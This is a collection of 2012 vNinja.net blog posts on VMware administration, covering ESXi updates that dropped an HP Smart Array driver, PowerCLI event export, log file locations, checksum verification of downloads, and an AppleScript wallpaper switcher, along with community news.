Sample screenshots # User Experience # For now I've only done a quick run-through of the HOL-OPS-01 - VMware vCenter Operations Manager Enterprise lab, but I must say that the user experience was responsive and intuitive. I had no problem navigating the lab environment and accessing the virtual machine consoles directly in my browser (Safari). The lab guide/manual was clear and to the point, and even included troubleshooting steps in case something didn't behave as expected. This is, as far as I can gather, the same platform Project Nee will use for the online training VMware will offer in the future. My Verdict # I'm impressed. The Hands-on Lab Beta looks great, and behaves according to its appearance. As the content catalog grows, this will quickly become an invaluable resource for every vAdmin out there; my only concern is how it will be priced when it hits general release. --- # VMware vSphere Health Check - What's in it for You? URL: https://vNinja.net/vmware-2/vmware-vsphere-health-checks-wha/ Date: 2012-12-04 Author: christian Tags: Best Practice, ESXi, Health Check, realworld, vCenter, VMware, vSphere VMware vSphere Health Check is a service provided by VMware Professional Services, either by their own consultants or by a consultant from a VMware Certified Solution Provider. I'm lucky enough to be employed by a Premier VMware Solution Provider who offers this service to our customers, and I've completed a fair number of these health checks in the last couple of months. You might ask what the value of the Health Check is, and for the end customer it's pretty clear-cut. They get a very detailed report on the current status of their vSphere infrastructure, complete with action items and concise recommendations for improvements. Of course, I sell these services professionally and am therefore biased by default.
What I want to focus on here, though, is not the value customers get out of the Health Check, but rather the incredible learning opportunity this service provides for you as a consultant. The data gathering part of the Health Check is done via software developed by VMware. The software is provided in two flavors: either a ThinApped Windows application, or a virtual appliance that you deploy in the customer's environment. Pick your poison, but I've mostly worked with the ThinApp version. It gathers a lot of interesting data from the target vCenter, and you can then take that data with you and generate a report based on it. That's where the fun starts. The HealthAnalyzer software comes with a web interface where you can look at everything it collected and prioritize the different findings. Of course, it also comes with suggested priorities from VMware for the given data. This is where the learning is for everyone conducting the health checks. By reading and understanding the automated observations generated through the data collection, you have a wealth of information available, complete with “best practices” recommendations from VMware (these are updated quarterly). “Best practices” is in itself a loaded term, and you should not blindly follow them without knowing what actually makes a best practice just that. It might not be applicable in the environment you are analyzing, but the thought process involved in looking at the data and determining whether it is applicable has a lot of value in and of itself. Of course, like any good consultant, the real answer is always “it depends…” Examples # It's hard to come up with arguments against the situation in the screenshot, but this is just an example of how detailed the information provided is.
Some observations even come with links to relevant documentation, providing more background on why something is recommended: For me, this has been an invaluable resource for learning and understanding why VMware recommends certain practices. If you work for a service provider, do yourself a big favor and check if you have access to the HealthAnalyzer software on VMware Partner Central, and if you do, download it and play around with it. Even if you don't plan on doing these checks as a service for new or existing customers, running it after you have done an install is a great, and automated, way of checking whether your installation adheres to the standards it should. And who knows, chances are that you'll end up learning a lot in the process. There is just no way that can be wrong. --- # VMware vCenter Operations Manager 5.6 Available URL: https://vNinja.net/virtualization/vmware-vcenter-operations-manager-5-6/ Date: 2012-11-30 Author: christian Tags: Release, vCenter Operations Manager, VMware, vSphere The new vCenter Operations Manager 5.6 is now generally available, and one of many improvements from v5.5 is the new licensing scheme. The new Foundation edition is the entry-level edition, which from now on is included in every licensed vSphere edition free of charge. That's right, you can now run vCenter Operations Manager 5.6 Foundation without purchasing any additional licenses. vCenter Operations Manager now comes in the following flavors:

- vCenter Operations Manager Foundation
- vCenter Operations Management Suite Standard
- vCenter Operations Management Suite Advanced
- vCenter Operations Management Suite Enterprise

For more details on the different editions and comparisons between them, have a look at VMware vCenter Operations Management Suite. Of course, vCenter Operations Manager 5.6 is compatible with the new vCenter 5.1 Web Client, integrating directly into the web interface.
Details on other new features and fixes in v5.6 are available in the What's New section of the official release notes. Also worth noting is that vCenter Operations Manager 5.6 supports VMware vCenter Server 4.0 Update 2 and later, managing hosts running ESX/ESXi 4.0 and later, which means that if you have an active SnS with VMware, you should be entitled to run the new Foundation edition even if you haven't upgraded your infrastructure to v5.1 just yet. In fact, you no longer have an excuse for not having a current health status for your critical virtual infrastructure. --- # Exporting vCenter Events with PowerCLI URL: https://vNinja.net/virtualization/exporting-vcenter-events-powercli/ Date: 2012-11-30 Author: christian Tags: automation, ESXi, Oneliner, PowerCLI, Powershell, realworld, vCenter, Virtualization, vSphere, vSphere 5, vSphere Client One of my clients has recently been having issues with their storage solution, and wanted to export the events from vCenter that show storage performance degradation, to aid in troubleshooting with the vendor. For some reason, and I have yet to confirm whether this is a bug in the vCenter 5.0 appliance or the vCenter Desktop Client, when an event export is done, the storage related events are not exported with the rest of the events. Thankfully we were able to get the event details exported using the following PowerCLI oneliner: PowerCLI C:\log> Get-VIEvent -Start 19/11/2012 -Finish 30/11/2012 | Export-Csv "events.csv" -NoTypeInformation -UseCulture This generates an events.csv file in the current directory, containing all the events in the given timeframe, from the vCenter it is connected to. And yes, the storage related events missing from the vCenter Desktop Client export are indeed included in the file generated by the Get-VIEvent cmdlet. Once again, PowerCLI to the rescue!
--- # VIP VCP Club 2012 URL: https://vNinja.net/vmware-2/vip-vcp-club-2012/ Date: 2012-11-15 Author: christian Tags: event, fun, Norway, VCP, VIP VCP Club, VMware What is VIP VCP Club? # This is a new concept by VMware Norway for certified VMware professionals, where the idea is to gather local certified VMware professionals for a day of hands-on labs, specialized technical sessions and general community building. Agenda #

- Storage/HA/DR/Clustering, presented by Lee Dilworth
- End User Computing, presented by Joel Lindberg
- vCenter Operations Management Suite, presented by Ulf Andreasson

The hands-on labs covered VMware Site Recovery Manager, vCenter Operations and Horizon Suite. The event itself was great, especially the speaker quality! Sadly the hands-on labs had too little time allotted to them, making it practically impossible to finish the labs in the timeframes given, but we did get to play around a bit! Thank you VMware Norway in general, and Stein in particular, for making this a reality. I look forward to the upcoming events! The VIP VCP 2012 Smurfs Group Shot (c) 2012 Stein Wilhelmsen --- # Why Did the HP BL460c G8 Lose Its Datastore? URL: https://vNinja.net/vmware-2/hp-bl460c-g8-lose-its-datastore/ Date: 2012-10-29 Author: christian Tags: BL460c, c3000, c7000, ESXi, G8, HP, P220i, Patch, ProLiant, Update, VMware Post Update: As per Preetam's comment, HP has published a customer advisory regarding the usage of install vs update. After installing a couple of brand new HP ProLiant BL460c G8 blades with HP Smart Array P220i controllers at a customer site, I decided to upgrade from the VMware-ESXi-5.0.0-Update1-623860-HP-5.20.43.iso Build 623860 used to install the blades, to the latest 821926 build offered by VMware. Normally this is a really easy process using VMware Update Manager, but since this is a new installation, all the prerequisites for that are not in place just yet, so I decided to use esxcli to perform the update.
After placing the downloaded ESXi500-201209001.zip offline bundle on the local datastore on the first host, I ran the update with the following command: (abbreviated for legibility) ~ # esxcli software vib install -d /vmfs/volumes/datastore1/ESXi500-201209001.zip Installation Result Message: The update completed successfully, but the system needs to be rebooted for the changes to be effective. Reboot Required: true VIBs Installed: [...] VIBs Removed: [...] ~ # So far so good! One quick reboot later (as quick as an HP blade can manage, anyway), my host was updated to ESXi 5.0.0 Build 821926 and everything looked fine. That is, until I wanted to put some new files onto the blade's local storage. Much to my surprise, there was no local storage to be seen at all. Thinking that something must have gone wrong while booting, I decided to try a new restart, and imagine my surprise when the blade booted up again, but this time with Build 623860. Thinking that I must have messed things up pretty badly, I decided to try the same procedure on the second HP ProLiant BL460c G8 blade, installed in the same manner. And yet again, I got the same results. While this is somewhat comforting when contemplating Albert Einstein's definition of insanity, it's not comforting when it comes to the procedure I followed for updating the hosts. This time around I recorded the output the esxcli command gave me, and found this little gem hidden inside the output: (unrelated VIBs removed) ~ # esxcli software vib install -d /vmfs/volumes/esx5local/ESXi500-201209001.zip Installation Result Message: The update completed successfully, but the system needs to be rebooted for the changes to be effective. Reboot Required: true VIBs Installed: [...], VMware_bootbank_scsi-hpsa_5.0.0-17vmw.500.0.0.469512, [...] VIBs Removed: [...], Hewlett-Packard_bootbank_scsi-hpsa_5.0.0-28OEM.500.0.0.472560, [...] ~ # So, in short, the update from VMware removes the HP bootbank VIB for the local SCSI controller, and replaces it with a VMware one.
Effectively this removes the ESXi host's ability to read the local datastore from the HP Smart Array P220i controller. What still baffles me, though, is that the first boot after applying the update boots Build 821926, but subsequent boots are on Build 623860… In the end, to rectify the issue, I found the scsi-hpsa-5.0.0-28OEM.500.0.0.472560.x86_64.vib file on hp.com, downloaded it and placed it on the host. I then ran the update again: ~ # esxcli software vib install -d /vmfs/volumes/datastore1/ESXi500-201209001.zip Installation Result Message: The update completed successfully, but the system needs to be rebooted for the changes to be effective. Reboot Required: true VIBs Installed: [...] ~ # After installing the update, I then installed the HP ProLiant Smart Array Controller Driver: ~ # esxcli software vib install -v file:/tmp/scsi-hpsa-5.0.0-28OEM.500.0.0.472560.x86_64.vib Installation Result Message: The update completed successfully, but the system needs to be rebooted for the changes to be effective. Reboot Required: true VIBs Installed: Hewlett-Packard_bootbank_scsi-hpsa_5.0.0-28OEM.500.0.0.472560 VIBs Removed: VMware_bootbank_scsi-hpsa_5.0.0-17vmw.500.0.0.469512 VIBs Skipped: ~ # This reverses the removal of the Hewlett-Packard_bootbank_scsi-hpsa_5.0.0-28OEM.500.0.0.472560 VIB by the VMware update itself. Another (quick) reboot, and finally my host was upgraded to the correct build and the local datastore was available too.
~ # cat /proc/driver/hpsa/hpsa0 hpsa0: HP Smart Array P220i Controller Board ID: 0x3355103c Firmware Version: 3.04 Driver Version: HP HPSA Driver (v 5.0.0-28OEM) Driver Build: 2 IRQ: 217 Logical drives: 1 Current Q depth: 0 Current # commands on controller: 0 Max Q depth since init: 0 Max # commands on controller since init: 4 Max SG entries since init: 129 Max Commands supported: 1020 SCSI host number: 0 hpsa0/C0:B0:T0:L1 Direct-Access LOGICAL VOLUME 3.04 RAID 1(1+0) ~ # Thankfully these blades had not yet been put into production, and I was free to wrestle with them as much as I wanted to make this work, without affecting anything other than my troubleshooting genes. I have not tested whether the same scenario unfolds if the hosts are updated via VMware Update Manager, but I suspect that the results would have been the same. Of course, the hosts could have been installed with the newer HP ESXi 5.0 U1 Sept 2012 refresh in the first place, and I probably would not have run into this issue, at least not until someone decided to apply a later patch to the host. All in all, I guess the lesson here is that you need to be careful when updating your hosts, and make sure you have a real retreat option ready if you need to quickly roll back to the previous build. The luxury of having the time and possibility to really troubleshoot the issue might not be available to you if you are upgrading production systems. Test your updates, every time. --- # Want Access to the VMworld 2012 Sessions? URL: https://vNinja.net/vmware-2/access-vmworld-2012-sessions/ Date: 2012-10-27 Author: christian Tags: Competition, fun, vmworld Fellow vExpert Rick Scherer is giving away a voucher that provides free access to all of the VMworld 2012 sessions, including associated MP3s and PDFs. Have a look at his post Win Access to VMworld 2012 Sessions and enter to win now! Good stuff Rick, real good!
Update October 30th: Fresh VCDX and fellow vExpert Joep Piscaer has followed suit and announced his own “Want to win a VMworld 2012 Subscription?” contest. Now you have two chances to win access! --- # vShield Endpoint Entitlement, not just for vSphere 5.1 URL: https://vNinja.net/vmware-2/vshield-endpoint-entitlement-vsphere-5-1/ Date: 2012-10-05 Author: christian Tags: Licensing, VMware, vShield, vShield Edge, vSphere When VMware vSphere 5.1 and vCloud Networking and Security 5.1 were launched at VMworld US in late August, one of the news items was the change in licensing relating to vShield Endpoint. vShield Endpoint is now included in every vSphere edition, with the exception of the lowest tier vSphere Essentials package. I was under the impression that you had to upgrade to the new 5.1 version to take advantage of the licensing change, and get licenses available for vShield Endpoint, but a new VMware Knowledgebase article named KB: 2036875 Downloading and enabling vShield Endpoint on supported vSphere platforms debunks that. The licensing change makes vShield Endpoint available for all customers with an active SnS, running vSphere 5.1.x, vSphere 5.0.x, or vSphere 4.1 U3! --- # Getting It Right: VMware Training and Certification URL: https://vNinja.net/vmware-2/right-vmware-training-certification/ Date: 2012-10-01 Author: christian Tags: Certification, labs, Training, VMware Everyone, and probably their extended family including their mother-in-law, has heard me whine and complain about the VCP training requirements. VMware has unveiled a new lab, namely Project Nee (Next-Generation Education Environment), and this is something I'm really excited about. Project Nee is described as this: VMware Project NEE is a new VMware Labs project providing a richly featured, powerful online learning and lab environment delivered from the cloud to any device, anywhere, anytime.
There aren't many details available at the moment, except that this seems to be exactly what I have been looking for from VMware: online access to a virtual lab environment, where you can access training resources in a flexible manner. Self-paced online training, without the need to spend days on end in a classroom. In fact, the site specifically mentions “VMware vSphere: Install, Configure, Manage” training as being beta tested at the moment. There is no information on pricing and availability just yet, but with VMworld Europe only a week away I would not be surprised if something is announced in Barcelona. With the VMware Hands-On Labs going public some time soon, and now Project Nee, VMware is certainly heading in the right direction as far as lab access and training is concerned. Dogfooding; you gotta love it! --- # VMware ESXi 4 vs ESXi 5 Log File Locations URL: https://vNinja.net/virtualization/vmware-esxi-4-vs-esxi-5-log-file-locations/ Date: 2012-09-17 Author: christian Tags: ESXi, ESXi 4, ESXi 5, Log Files, Ops, VMware, vSphere This post is inspired by a tweet from Andrew Storrs, where he points out that the host log file locations have changed between ESXi 4 and ESXi 5. Note: This post has been updated with new log files for ESXi 5.1 ESXi 4 Log File Locations # [table id=6 /] ESXi 5 Log File Locations: # [table id=5 /] Between version 5.0 and 5.1 the log file locations have not changed, but a couple of new logs have been added. ESXi 5.1 New Log File Locations: # [table id=10 /] Clearly the number of host log files has increased in newer versions, and that should make it much easier to find the log entries you are looking for. More granular logging into specialized log files can only be a good thing. Logs from vCenter Server Components on ESXi 5.1: # [table id=11 /] Just remember that ESXi only logs to memory, and that you need to set up logging to a syslog server to preserve logs between reboots.
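Pointing a host at a syslog server can be done from the ESXi shell as well. A minimal sketch for ESXi 5.x, assuming the syslog hostname below (which is a placeholder) and that the host can reach it; this is a host configuration fragment, so adapt it to your environment:

```shell
# Set a remote syslog target on ESXi 5.x (hostname is a placeholder).
esxcli system syslog config set --loghost='udp://syslog.example.com:514'
# Reload the syslog daemon so the new target takes effect.
esxcli system syslog reload
# Allow outbound syslog traffic through the ESXi firewall.
esxcli network firewall ruleset set --ruleset-id=syslog --enabled=true
```

The same setting can of course also be pushed to many hosts at once via PowerCLI or Host Profiles.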
If ESXi 5 is installed on local disk, the log files will be persistent through reboots, since it creates a zipped archive in /var/run/log. If ESXi is deployed via Auto Deploy, no local disk is used, the log files are not persistent, and they need to be collected by an external syslog service. For more details about various VMware products and their log file locations, check VMware Knowledgebase article 1021806 and VMware Knowledgebase article 2032076 --- # Verifying VMware Downloads URL: https://vNinja.net/vmware-2/verifying-vmware-downloads/ Date: 2012-09-11 Author: christian Tags: Bash, Download, Integrity, MD5, OS X, SHA1, Terminal, VMware, vSphere Now that vSphere 5.1 and assorted products have been released into the wild, how do you check the integrity of your downloaded files? As you might be aware, VMware publishes both MD5 and SHA1 hashes for their files, making it possible to check if the file you just downloaded is identical to the file offered by VMware. Checking the MD5 or SHA1 hash for a single file is easy, at least in OS X where you don't need any third-party tools. Open up Terminal, navigate to your download directory, and run either the md5 command or the shasum command to calculate the file's checksum. You can then compare the result to the checksums provided by VMware on the download page. For a single file, this is not a problem, but what if you have downloaded a bunch of files into a directory and want to calculate the checksums for all of them in one go? Thankfully this is pretty simple as well, just add a little Terminal (it's really bash, I know) magic and you're all set: MD5: find . -type f -exec md5 '{}' \; SHA1: find . -type f -exec shasum '{}' \; These small bash one-liners go through all the files in the current directory, and calculate checksums for each of them. There are tools available for Windows that perform the same operations, but I haven't looked into those for this post.
A collection of MD5/SHA1 checksums for the vSphere 5.1 Release: # [table id=9 /] As far as I can tell, VMware does not offer a single page that lists all of the checksums for their files, something that makes finding the checksums a bit tedious. I've found that the best way to find them, after you have downloaded the files, is to check the My VMware Downloads History page, since it shows you all the downloads you have performed on one page, instead of going through multiple pages. Find the "Show Checksums" link to show the checksums, without having to open the download page for each item. Wishlist # I'm sure some scripting wiz kid could easily create a script that runs the checksum generation and then checks a given text file for a match, but I really wish VMware would create a service that lets you easily check the checksum for a given file, without having to log on to VMware.com at all. If we could do a simple HTTP request to a service that returns the checksum for a given file, that would easily be scriptable and comparisons could be performed automatically. That way, doing a request like this (yes, this is indeed a fake non-working URL): curl vmware.com/integrity/md5/vCO_VA-5.1.0.0-817595_OVF10.cert would return a simple c636547afb4de258d9164a74ac622674 Good idea? Bad idea? Let me know! --- # ... and All I Asked for Was a Pin URL: https://vNinja.net/virtualization/all-i-asked-for-was-a-pin/ Date: 2012-09-11 Author: christian Tags: Care Package, fun, Pins, Stickers, VMware, vmworld Way back in the old days, you know, when VMworld 2012 was held in San Francisco, I tweeted that if someone could get hold of a VCP pin for me, I would be very happy. Luckily Paul Valentino from vCommunity Trust picked that up, and apparently went on quite the scavenger hunt on my behalf. Imagine my surprise today when this little square meter of carton appeared, courtesy of Mr.
Valentino: For some reason I suspected that Paul had shipped me more than just a VCP pin, and that there might be a couple of other things in the package as well. Indeed: a VMworld 2012 backpack filled with various items, like the VMware vSphere 5.1 Clustering Deepdive book, the NetApp Data ONTAP Edge VSA, and a VMware Workstation 9 license key, amongst other things (stickers, pins and a t-shirt). Thanks a lot Paul, your VMworld Marshall Plan is very, very much appreciated! --- # The Personal Value of Certification URL: https://vNinja.net/rant/personal-certification/ Date: 2012-09-01 Author: christian Tags: Certification, Rant Fabio Rapposelli's post "On the Real Value of IT certifications" highlights some of the current problems related to IT certifications in general, and basic "entry level" exams in particular. The problems with brain dumps, lack of experience and testing methods are not new, and the "Paper MCSE" term was coined back in the early 2000s, when the influx of newly certified Microsoft Certified Systems Engineers with little or no real-world experience flooded the market. Sure, they were certified, but without hands-on experience, what is a certification worth? All in all, there is nothing new under the sun. As long as monetary or other professional rewards are in the picture, some people will do whatever it takes to achieve them. The emperor is still not wearing any pants, and even if we don't like to admit it, the desire to be or become better is human nature, and for some people this means stealing, lying and cheating. As Fabio mentions, replacing multiple-choice exams with hands-on, lab-based scenario ones is probably the best way to go, even for the "entry level" exams. I've mentioned this before, in VCP 5 Certification Requirements Clarification, but removing mandatory training classes might also be a way to lower the cost of obtaining a certification.
This in turn might provide less incentive to study brain dumps, since the "cost of failure" won't be as high. And yes, the moon just might be made of cheese. On my part, certifications play a dual role. For one, they are a way for me personally to validate my skill set, and they give me tangible goals to work towards. Secondly, I work for a VAR that has competency requirements from their partners, and I work to fulfill those. That dual focus helps me keep my integrity, but if my only goal was to fulfill some partner's (paper) competency requirements, the story might just be different. What do you think? Do most people pursue certifications for personal fulfillment, or has certification lost its luster and become generally worthless? --- # Shanghai... we have a problem... URL: https://vNinja.net/virtualization/shanghai-problem/ Date: 2012-08-20 Author: Tags: Disaster, Fire, Virtualization My Saturday morning started the same as any other. I checked my emails and my tweets, started a coffee, walked my dog and got into the shower. My iPhone buzzing on the sink caught my attention a few minutes into it. Covered in soap (the rest censored for the public), I answered the call. Without getting into too many details about my organization: my boss's boss's boss contacted me, reporting a fire in one of our server rooms in Shanghai, China. Trying not to panic, I got it together and agreed to meet and discuss ASAP. For privacy reasons, let's cut to Monday. I drove to the Chinese Embassy that morning here in Zuerich and begged for a visa, as my plane was leaving at 19:00 that evening. They laughed initially, since normal processing time is 7 days. When they noticed the seriousness of the situation they told me to return in 1 hour and I would be granted a 1-year visa. Cut to Monday night: I flew from Zuerich to Charles de Gaulle in Paris, had a few problems and ran across the entire airport, but in the end made my flight. This is normal for changing planes in Paris :).
After I got on the plane I shut myself down and forced myself to sleep, because I knew I would have a big job on my plate when I arrived. I managed to get 4-6 hours of restless sleep and landed in Shanghai in the afternoon. I called the office to let them know about my arrival, they sent a car, and the fun began. When I arrived at the office I found 10 seriously charred physical servers, some with cut-off, melted power plugs and ethernet cables still in them. I quickly asked them to place stickers on the servers that were priority, and to explain to me exactly which application/server was the most important to recover first. Again, without getting into too much detail: our backups there were "no longer available". I managed to get a critical DB running again by copying the RAID config to disk right before it crashed again, switched the disks over to a loaner server, wrote the RAID config to the controller, and quickly began a P2V to a new server I was provided, on which I had installed vSphere 5 when I arrived. This was only one of the many Hail Marys I was able to complete this week. At the end of the week, 72 hours of work later, talking through translators, and after a brief departure for some rest, I was able to recover all but the oldest server. I turned 10 physical servers into 2 vSphere 5 hosts with local storage. Better than nothing, and flexible enough to change later as needed. The moral of this story is that in the face of disaster, one of the best tools you have in your belt is virtualization. You have flexibility that normally is not possible, and can add more resources later as needed with minimal pain. I know this goes back to basics, but sometimes we need to go back to basics to really refresh our thoughts on the technology. --- # VMware launches Public vCloud "Test-Drive" URL: https://vNinja.net/news/vmware-launches-public-vcloud-test-driv/ Date: 2012-08-16 Author: christian Tags: Cloud, News, Opinion, vCloud, VMware VMware Offers vCloud "Test-Drive" with New Evaluation Service.
This announcement doesn't seem to be "Project Zephyr", which, if the rumors are true, is VMware's own fully fledged IaaS service. This Public vCloud "Test-Drive" service, which VMware themselves describe as "white-label" from a vCloud service provider, seems like a way for VMware to provide cheap test-drive access to vCloud through their existing service providers. Where the rumored "Project Zephyr" might be seen as a competing service, Public vCloud looks to be engineered to drive long-term customers to the existing ecosystem of providers. I see this as a great move by VMware, that they actually put their name, expertise and marketing powers behind a test-drive setup, with a unified pricing scheme, that should drive customers towards existing providers. The need for this evaluation service is pretty clear to me: unlike with other cloud providers, you can actually move workloads to a vCloud from your own private cloud setup using vCloud Connector. For customers invested in VMware products to power their private clouds this should be very interesting, and in many cases it might just be what is needed for a lot of potential clients to dip their toes into the vCloud ecosystem. For now, it looks like Public vCloud only offers Linux as the operating system, something that might be a limiting factor for many customers, but I'm sure that will change down the line. Like it or not, I still think that for something like vCloud to be really interesting to most enterprises, at least the small to medium ones, Windows Server needs to be an option. Update: According to Try Your Own vCloud in Minutes: To get you started quickly, vCloud Service Evaluation offers a variety of pre-built content templates (at no charge) including Wordpress, Joomla!, Sugar CRM, LAMP stack, Windows Server and a mix of web and application stacks and OSes. You can also Bring Your Own VM (BYOVM). That's right, you can BYOVM and put it into your own private catalog for deployment.
You can do that either by uploading it directly into vCloud Director, or you can run the vCloud Connector VMs in your account (they're in the public catalog) and use that to transfer your VMs from vSphere or any other vCloud. So, Windows Server VMs are indeed included, and supported right off the bat. As a proof of concept, and a way for VMware to show that they are both dogfooding (something I'm sure Paul Maritz will enjoy as he departs from VMware) and investing in their service provider ecosystem, this seems like a good move that might accelerate deployments, or at least let the curious have a look at a working setup. But then again, what do I know. [IANAA]: I am not an analyst --- # Building End-User Computing Solutions with VMware View Book Available URL: https://vNinja.net/virtualization/building-end-user-computing-solutions-vmware-view-book/ Date: 2012-08-03 Author: christian Tags: Book, EUC, Horizon, ThinApp, View, Virtualization, VMware, VMware View Mike Laverick and Barry Coombs have released their new book, elegantly titled "Building End-User Computing Solutions with VMware View". Not only is this a great book, it is something that every existing and potential administrator of VMware View (and related technologies in the EUC area) should add to their (digital) bookshelves. I'll let the authors themselves describe it: This book is all about VMware View 5.1 and ThinApp 4.7.2 administration - and it takes in a wide scope of complementary technologies from the likes of Teradici, BitDefender and F5 Networks. Towards the end the focus switches away from virtual desktops to look at the future of end-user computing, including VMware's ThinApp Factory and Horizon Application Manager. This book is a not-for-profit venture. The monies raised by the sale of the book will be donated in full to the work of UNICEF. UNICEF carries out work across the globe that benefits all children regardless of their social, ethnic, religious or geographical location.
It's our sincere hope that people will use the legitimate sources for acquiring this book – and by doing so support the work of UNICEF. Writing the foreword for a book like this has been a secret personal goal of mine for quite some time, so when I was approached by Mike about writing it I immediately jumped on the opportunity. I'm truly honored to have a small part in this non-profit project, and I hope that in the end it will generate a sizable contribution to the great work done by UNICEF. Order your copy today! --- # Applescript, Desktop Wallpaper and Growl. Automagically. URL: https://vNinja.net/osx/applescript-desktop-wallpaper-growl-automatically/ Date: 2012-07-24 Author: christian Tags: Applescript, automation, fun, Mac, OS X, Scripting I've been a Mac and OS X user for about 7 months now, but to be honest I have not been very experimental in my usage of my MacBook Air. Until now, my main focus has been basic usage of the hardware and operating system, and making it work in my corporate environment. As I feel that I've reached mission-accomplished status on that initial project, I decided to use some of my "free" vacation time to play around and experiment a bit more. For some reason, I decided to start playing around with Applescript and try to create something that changes my desktop wallpaper based on a "Home" and a "Work" scenario. Initially I made a quick script, my first ever Applescript, that presented a dialog box asking me if "Home" or "Work" was the current status, and then changed the desktop wallpaper accordingly. I then assigned that to a hotkey, so I could quickly change between the two modes. That solution left me with two things: one, it worked! And two, it could be done better by adding some automation to it.
Here is the solution I ended up with: #

```applescript
# Populate ipaddr variable with IP address
set ipaddr to do shell script "ifconfig | awk '/broadcast/ {print $2}' | tail -1"

# Check if connection is home connection, based on IP subnet
# If not connected, set ipaddr variable to 0.0.0.0 to avoid empty variable issues
# Dirty hack to add padding to zero values, but hey, it works for me.
if (ipaddr is "") then
	set ipaddr to "000.000.0.0"
end if
set ipaddrtxt to (characters 1 thru 9 of ipaddr) as string

if ipaddrtxt is "192.168.5" then # Change this to your own subnet
	set situation to "Home"
else
	set situation to "Work"
end if

# Get current desktop image path
tell application "System Events"
	tell current desktop
		set currentDesktop to (get picture as text)
	end tell
end tell

# Build the desktop image path
set desktopPath to "Macintosh HD:Users::Dropbox:switcher:" & situation & ".png" # Change this to your own paths

# Only tell Finder to change the desktop and notify Growl if a change is required (eg. desktop path not equal to current path)
if currentDesktop is not desktopPath then
	# Tell Finder to change the desktop
	tell application "Finder"
		set desktop picture to {desktopPath} as alias
	end tell
	tell application "GrowlHelperApp"
		set the allNotificationsList to {"Wallpaper Change"}
		set the enabledNotificationsList to {"Wallpaper Change"}
		register as application "Wallpaper Change" all notifications allNotificationsList default notifications enabledNotificationsList icon of application "Script Editor"
		-- Send a Notification...
		notify with name "Wallpaper Change" title "Wallpaper Change" description "Wallpaper changed to " & (situation) application name "Wallpaper Change"
	end tell
end if
```

I know my theme isn't very suited for code pastes, so the whole applescript source code is also available for download.
After the script was finished, I added it to my Geektools bash script, which refreshes at a fairly frequent interval:

```shell
# Run Background Switcher Applescript
osascript /Applescript/Switcher.scpt
```

Sure, I could have used a crontab instead, but for me the easiest way to get this working quickly was to add it to the existing setup I had in place. Demo time! # The Applescript detects if the computer's IP address is on a given subnet, and if so it sets the wallpaper specified for that subnet, dubbed "Home". If it determines that it is not on that particular subnet, it's officially at "Work" and sets the wallpaper accordingly. That's all the logic there is to it, and I'm sure it can be improved, either by me or, more likely, by someone who has been hit by the Applescript clue bat. My desktop wallpaper images are stored in a given folder in my Dropbox, with one of them called Home and the other called Work. This limits the script to those two given file names, and it switches between the two accordingly. It also assumes that the files are in the PNG format. An added bonus of storing the files in Dropbox is that I can remotely change out the images, and keep the wallpapers synchronized between several computers if I wish to do so. Note that I am under no circumstances a developer and that this is my first Applescript. I am sure there are much better ways to accomplish the same things, with better error handling and overall better code quality, but the fact is that this works for me and I'm happy with it. --- # 10 minute lightning Tech Talk at VMworld? URL: https://vNinja.net/vmware-2/techtalks-at-vmworld2012/ Date: 2012-07-22 Author: christian Tags: Community, Flash Talk, VMware, VMWorld 2012 I love it when a plan comes together, especially when someone gets an idea and then fires on all cylinders and executes!
As mentioned before, there has been a lot of talk about various ways to create a "soapbox" for all those who submitted VMworld sessions and got rejected, or those who did not submit but would still like to present. Thankfully the guys behind vBrownBags have teamed up with VMware Communities and are now offering this opportunity at VMworld 2012. I am not sure if this also extends to VMworld Europe, but it is happening at the US event at least. To read all the details, including sign-up details, check TechTalks powered by vBrownBags - Coming to VMworld --- # vSphere 5: Creating a Hardware Version 4 VM URL: https://vNinja.net/virtualization/vsphere-5-creating-hardware-version-4-vm/ Date: 2012-07-02 Author: christian Tags: EasyVNX, ESX, ESX 3.5, ESXi, Hardware Version, VMware, vSphere, workaround I recently had a need to create a VM for usage on ESX 3.x, but the only thing available to me in my lab was vSphere 5, which naturally creates new VMs with the latest and greatest version 8 virtual hardware. The following table lists the virtual hardware versions and the corresponding ESX and ESXi releases:

| Version | Virtual Hardware Version |
|---------|--------------------------|
| ESXi 5.x | 8 |
| ESX/ESXi 4.x | 7 |
| ESX 3.x | 4 |
| ESX 2.x | 3 |

Naturally, an ESXi 5.x host can run VMs created with older hardware versions, but it is not possible (through the vSphere Client) to create a new VM with an old hardware version, and I needed to create a v4 VM for later export to an ESX 3.x host. Of course, I could have created the VM on the ESX host that it was supposed to run on in the first place, but the host in question was unavailable at the time and the plan was to prepare the VM off-site before deployment in the production environment. Since I no longer had a valid license for ESX 3.5, the easiest way I found to create a hardware version 4 VM and configure it on vSphere 5 was to use Easy VMX to create the basic VM (vmx file) instead of hacking away at creating it manually.
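For reference, the hardware version lives in a single key of the resulting .vmx file. A hand-written sketch of the relevant lines (the names and values below are illustrative, not Easy VMX's literal output); it's the virtualHW.version key that pins the VM to hardware version 4:

```
config.version = "8"
virtualHW.version = "4"
displayName = "legacy-vm"
guestOS = "otherlinux"
memsize = "512"
scsi0.present = "TRUE"
scsi0.virtualDev = "lsilogic"
scsi0:0.present = "TRUE"
scsi0:0.fileName = "legacy-vm.vmdk"
ethernet0.present = "TRUE"
```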
Easy VMX created the .vmx file that I needed to register a hardware version 4 VM on an ESXi 5.x host and edit it through the vCenter client. Of course, it creates disk files that are incompatible with ESX, but that's of no concern as you can just remove the invalid devices and add new ones through the vCenter client. All in all this little "trick" worked without a hitch, and the small Linux machine I had set up for the client worked perfectly when deployed on the old ESX 3.5 install. Of course, the best option would be to reinstall the old ESX 3.5 host with ESXi 5, but as this was a system due to be decommissioned very soon, that was not a real option for the client. The main purpose of the VM I created was to act as an alerting system for incoming email, warning that the email addresses had changed to a new domain, and that emails sent to the old one would not be read or acted upon. --- # VMworld Session Reject Club URL: https://vNinja.net/virtualization/vmworld-session-reject-club/ Date: 2012-06-27 Author: christian Tags: Collaboration, Community, UnConference, VMware, vmworld, VMworld2012 **VMworld Session Reject Club 1st RULE: You do talk about Reject Club.** Today VMware sent out notifications to VMworld 2012 session submitters, with a yay or nay email. Of course, this sparked a lot of conversation on Twitter, and Scott Lowe published a blog post proposing a VMworld Unconference, exploring several options:

- A physical "unconference"
- A virtual "unconference"
- A series of 10-minute "flash talks" at VMworld 2012

In essence I agree with Scott, a combo of #2 and #3 would be great. #2 for people not attending VMworld, #3 for people attending, if VMware allows it. I remember discussing this same topic with Mike Laverick during Tech Field Day #6 in Boston last year, and I'm glad to see several other people discussing the possibility of doing something along the lines of #2.
